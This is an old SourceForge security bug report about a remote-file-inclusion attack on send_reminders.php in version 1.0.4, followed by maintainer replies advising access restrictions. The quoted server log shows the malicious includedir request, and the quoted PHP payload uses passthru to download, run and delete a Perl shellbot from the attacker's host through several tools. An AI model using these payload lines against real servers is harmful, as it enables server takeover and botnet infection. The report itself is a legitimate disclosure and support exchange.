Work at SourceForge, help us to make it a better place! We have an immediate need for a Support Technician in our San Francisco or Denver office.

Close

#1720 Vulnerability in 1.0.4 send_reminders.php

Security_Hole
closed
Craig Knudsen
Security (98)
5
2006-12-10
2006-09-01
michael
No

My web host reports the following on my installation of
1.0.4:

[Begin quote]

Some hacker overloaded the server this morning by using
send_reminders.php to run some external code. I
renamed the file until I can find a patch to fix it.

Here is one of the log entries:

212.160.192.6 - - [31/Aug/2006:06:56:43 -0500]
"GET
/tools/send_reminders.php?includedir=http://tckct.co.uk/_cgi-bin/m4d.txt?
HTTP/1.1" 200 74 "-" "libwww-perl/5.803"

The file at http://tckct.co.uk/_cgi-bin/m4d.txt?
HTTP/1.1 looked like this:

<?
passthru('cd /tmp;wget
http://tckct.co.uk/_cgi-bin/bot.txt;perl bot.txt;rm
-f bot.txt*');
passthru('cd /tmp;curl -O
http://tckct.co.uk/_cgi-bin/bot.txt;perl
bot.txt;rm -f bot.txt*');
passthru('cd /tmp;lwp-download
http://tckct.co.uk/_cgi-bin/bot.txt;perl
bot.txt.txt;rm -f bot.txt*');
passthru('cd /tmp;lynx -source
http://tckct.co.uk/_cgi-bin/bot.txt
> >bot.txt;perl bot.txt;rm -f bot.txt*');
passthru('cd /tmp;fetch
http://tckct.co.uk/_cgi-bin/bot.txt >bot.txt;perl
bot.txt;rm -f bot.txt*');
passthru('cd /tmp;GET
http://tckct.co.uk/_cgi-bin/bot.txt >bot.txt;perl
bot.txt;rm -f bot.txt*');
?>
Owned by Morgan

The file at http://tckct.co.uk/_cgi-bin/bot.txt looked
like this:

#!/usr/bin/perl
# VulnScan v6 Stable By Morgan
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
# www.priv8.com.ar
#
#
# Greets to irc.gigachat.net :: #Morgan
#
#

[End quote]

Any help would be appreciated,

michael

Discussion

  • Ray Jones
    Ray Jones
    2006-09-01

    Logged In: YES
    user_id=1090373

    This problem was thought to be corrected in v1.0.4. Can you
    please get the the CVS id number from the send_reminder.php
    file so we can verify the version?

    Ask you admin to limit assess to this file to localhost.
    THis assumes your are using a cron job to normally run
    send_remindes

    -Ray

     
  • Ray Jones
    Ray Jones
    2006-09-01

    • status: open --> pending
     
  • michael
    michael
    2006-09-01

    send_reminders.php

     
    Attachments
  • michael
    michael
    2006-09-01

    • status: pending --> open
     
  • michael
    michael
    2006-09-01

    Logged In: YES
    user_id=1588243

    $Id: send_reminders.php,v 1.21.2.3 2006/06/07 15:10:46
    cknudsen Exp $

    In case this isn't what you needed I've attached the file.
    I'll pass your suggestion on to my host.

    Thanks for responding so promptly. I'll watch for further
    comments.

    Michael
    mburp

     
  • michael
    michael
    2006-09-02

    Logged In: YES
    user_id=1588243

    If its of any interest my host has identified the scipt
    triggered as 'Perl/Shellbot'.

    http://vil.nai.com/vil/content/v_130620.htm

    Michael
    mburp

     
  • Ray Jones
    Ray Jones
    2006-11-09

    Logged In: YES
    user_id=1090373

    Has anyone else experienced this problem? The 'includedir'
    issue was solved as part of the v1.0.4 upgrade. I'm not sure
    what else we can do at this point.

    I do recommend restricting access to the tools directory at
    the server level. You can check with your ISP on how best to
    do this. I have mine limited to localhost.

    -Ray

     
  • Ray Jones
    Ray Jones
    2006-11-09

    • status: open --> pending
     
  • Logged In: YES
    user_id=1312539
    Originator: NO

    This Tracker item was closed automatically by the system. It was
    previously set to a Pending status, and the original submitter
    did not respond within 30 days (the time period specified by
    the administrator of this Tracker).

     
    • status: pending --> closed